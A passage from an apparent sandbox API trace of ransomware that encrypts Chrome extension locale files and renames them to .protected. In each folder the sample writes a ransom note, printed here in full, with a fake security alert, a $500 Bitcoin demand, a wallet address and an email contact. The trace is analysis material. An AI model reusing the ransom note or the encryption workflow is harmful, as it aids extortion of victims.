lpString2=".") returned 1 [0081.191] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.191] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.191] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.191] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.191] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0081.192] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.192] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.192] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.192] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0081.192] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0081.192] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0081.192] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.192] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.195] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0081.195] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.195] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.195] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.195] CloseHandle (hObject=0x168) returned 1 [0081.195] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.protected") returned 169 [0081.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.protected")) returned 1 [0081.196] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.196] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.196] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\RESTORE_FILES.txt") returned 163 [0081.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0081.197] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.197] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.198] lstrlenA (lpString="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") returned 684 [0081.198] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0081.198] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.198] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.198] CloseHandle (hObject=0x164) returned 1 [0081.198] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="Windows") returned -1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="Program Files") returned 1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="Program Files (x86)") returned 1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="$Recycle.bin") returned 1 [0081.198] lstrcmpiW (lpString1="sr", lpString2="System Volume Information") returned -1 [0081.198] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr") returned 145 [0081.198] lstrcmpW (lpString1="sr", lpString2=".") returned 1 [0081.198] lstrcmpW (lpString1="sr", lpString2="..") returned 1 [0081.198] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\*") returned 147 [0081.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0081.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.199] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.199] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.199] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.199] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.199] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\.") returned 147 [0081.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.199] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.199] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\..") returned 148 [0081.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.199] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.199] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.199] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.199] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0081.199] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.199] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.199] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.199] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0081.201] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0081.201] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.201] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json") returned 159 [0081.201] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.201] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x32c, lpOverlapped=0x0) returned 1 [0081.202] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffcd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.202] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x32c, lpOverlapped=0x0) returned 1 [0081.203] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.203] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.203] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.203] CloseHandle (hObject=0x168) returned 1 [0081.203] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.protected") returned 169 [0081.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\messages.json.protected")) returned 1 [0081.204] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.204] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.204] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\RESTORE_FILES.txt") returned 163 [0081.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0081.205] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.205] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.206] lstrlenA (lpString="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") returned 684 [0081.206] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0081.206] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.206] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.206] CloseHandle (hObject=0x164) returned 1 [0081.206] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0081.206] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0081.206] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv") returned 145 [0081.206] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0081.206] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0081.206] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\*") returned 147 [0081.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0081.206] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.207] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.207] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.207] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.207] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.207] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\.") returned 147 [0081.207] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.207] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.207] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.207] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.207] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.207] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.207] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.207] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\..") returned 148 [0081.207] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.207] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.207] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.207] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.207] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.207] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0081.207] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.207] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.207] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.207] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0081.208] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
